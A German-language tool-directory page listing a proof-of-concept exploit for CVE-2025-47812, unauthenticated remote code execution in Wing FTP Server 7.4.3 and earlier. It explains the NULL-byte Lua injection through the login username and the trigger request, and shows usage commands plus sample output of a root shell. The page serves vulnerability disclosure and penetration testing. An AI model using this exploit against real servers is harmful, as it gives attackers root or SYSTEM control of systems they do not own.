Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC — Proof-of-Concept-Exploit für CVE-2025-47812: Nicht authentifizierte Remote-Code-Execution in Wing FTP Server <= 7.4.3 über NULL-Byte-Injection im Benutzernamenparameter, die Root-/SYSTEM-Shell-Zugriff ermöglicht. | Kitploit
Tools/GitHubGitHub/estebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubestebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

Proof-of-Concept-Exploit für CVE-2025-47812: Nicht authentifizierte Remote-Code-Execution in Wing FTP Server <= 7.4.3 über NULL-Byte-Injection im Benutzernamenparameter, die Root-/SYSTEM-Shell-Zugriff ermöglicht.

Repository anzeigen
21vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-47812 — Wing FTP Server <= 7.4.3 Nicht authentifizierte RCE (PoC)

Schwachstelle zur nicht authentifizierten Remote-Codeausführung in Wing FTP Server <= 7.4.3. Ein während der Anmeldung in den Parameter username injiziertes NULL-Byte bewirkt, dass Lua-Code in die Sitzungsdatei geschrieben wird. Wird /dir.html mit dem resultierenden Sitzungs-Cookie aufgerufen, wird der injizierte Code ausgeführt – unter Linux als Root, unter Windows als SYSTEM.


So funktioniert es

  1. Ein manipulierter POST an /loginok.html injiziert ein NULL-Byte gefolgt von Lua-Code in das Feld username.
  2. Der Server erstellt eine Sitzungsdatei, die den nicht bereinigten Benutzernamen enthält (einschließlich der Lua-Nutzlast).
  3. Eine GET-Anfrage an /dir.html mit dem zurückgegebenen UID-Cookie löst die Ausführung des injizierten Lua-Codes aus.
  4. Das Skript meldet sich zwischen den Befehlen ab, um das Limit für gleichzeitige Sitzungen des Servers nicht zu überschreiten.

Voraussetzungen

  • Python 3
  • Abhängigkeiten installieren:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Verwendung

root@kitploit:~
python3 exploit.py -u http://TARGET

Beispiel:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)

[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
root

Referenzen

  • CVE-2025-47812
  • Wing FTP Server 7.4.4 Release (Fix)
  • Original-PoC von 4m3rr0r

Credits

  • Entdeckung & ursprünglicher Exploit: Sheikh Mohammad Hasan aka 4m3rr0r
  • Bereinigung & Vereinfachung: Esteban Zárate
Tool herunterladen